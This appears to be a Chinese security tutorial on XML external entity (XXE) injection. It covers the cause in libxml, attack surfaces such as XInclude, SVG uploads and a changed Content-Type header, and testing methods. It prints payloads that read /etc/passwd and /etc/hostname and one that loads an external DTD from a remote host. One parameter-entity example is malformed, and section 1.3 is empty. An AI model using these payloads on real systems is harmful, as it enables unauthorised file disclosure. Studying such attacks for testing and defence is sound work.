0x01 XXE（XML外部实体注入）漏洞

1.1 漏洞原因

1.2 漏洞构造方式

1.3 XML可解析的协议

0x02 寻找XXE漏洞隐藏的攻击面

2.1 XInclude攻击

2.2 通过文件上传进行XXE攻击

2.3 通过修改Content-Type头进行XXE攻击

0x03 如何查找和测试XXE漏洞

0x01 XXE（XML外部实体注入）漏洞

1.1 漏洞原因

XML外部实体注入（XML Extenrnal Entity Injection），简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用，导致服务端在解析用户提交的XML信息时未作处理直接进行解析，导致加载恶意的外部文件和代码，造成任意文件读取，命令执行、内网扫描等危害。

libxml<2.9 默认开启

1.2 漏洞构造方式

1.2.1 直接通过DTD外部实体声明

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "file:///etc/passwd">]><a>&b;</a>

1.2.2 通过DTD外部实体声明引入外部DTD文档

#构造数据包
<?xml version="1.0"?><!DOCTYPE m [<!ENTITY b SYSTEM "http://mark4z5.com/evil.dtd">]><a>&b;</a>#而http://mark4z5.com/evil.dtd内容为<!ENTITY b SYSTEM "file:///etc/passwd">
​

1.2.3 通过DTD外部实体声明引入DTD文档

# 构造数据包
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY %b SYSTEM "http://mark4z5.com/evil.dtd">]><a>%b;</a>#http://mark4z5.com/evil.dtd文件内容<!ENTITY b SYSTEM "file:///etc/passwd">
​

1.3 XML可解析的协议

0x02 寻找XXE漏洞隐藏的攻击面

XXE漏洞的攻击面通常为HTTP传输流量下的XML数据请求，但是在其他方面可能也存在XXE漏洞。

2.1 XInclude攻击

一些应用程序在用户提交数据后，服务器将数据嵌入到XML文档中，然后对XML进行解析。例如当客户端提交的数据被放入后端的SOAP请求，然后由SOAP服务处理时，就会发生这种情况。

由于无法控制XML文档，对DTD文档进行修改触发而XXE漏洞，我们可以使用Xinclude进行攻击。XInclude 是一种使用元素、属性以及 URI 引用来合并 XML 文档的机制，它是XML规范的一部分，允许在子文档中构建XML文档。我们可以在XML文档中放入恶意数据来进行XInclude攻击，攻击条件为我们可以控制传输中的数据，将其替换为服务器短的XML文件。

通过参考XInclude命名空间和提供我们想要包含的文件路径，可以完成XInclude的XXE攻击。

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

2.2 通过文件上传进行XXE攻击

一些应用程序允许上传使用XML或者包含XML组件的格式文件，并且在服务端会对其进行处理、验证，常见的有DOCX、SVG等格式。

尤其在图片上传中，服务端可能期望获取到PNG、JPG格式的图片，但是服务端使用的处理库可能同样是支持SVG格式的，所以我们可以通过上传SVG格式的图片来进行XXE攻击。

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

2.3 通过修改Content-Type头进行XXE攻击

大多数情况下，POST请求包使用的是默认的application/x-www-form-urlencoded。有些网站希望接收这种格式的请求，但会容忍其他内容类型，包括XML。

# 普通的请求包：POST /action HTTP/1.0Content-Type: application/x-www-form-urlencodedContent-Length: 7foo=bar# 可以替换为：POST /action HTTP/1.0Content-Type: text/xmlContent-Length: 52<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

如果应用程序容忍消息正文中包含 XML 的请求，并将正文内容解析为 XML，那么您只需将请求重新格式化为使用 XML 格式即可到达隐藏的 XXE 攻击面。

0x03 如何查找和测试XXE漏洞

通过定义一个指向系统文件的外部实体，尝试对系统文件目录进行遍历，查看返回包是否包含XXE注入信息。

构建http://dnslog.cn/等基于可控的外部实体注入，然后对可控URL进行监控，判断是否存在XXE漏洞。

对于用户端使用非XML文档交互的接口，使用XInclude攻击来尝试包含一个有用的系统文件。

参考资料：

XXE漏洞详解(XML外部实体注入)_谢公子的博客-CSDN博客

What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy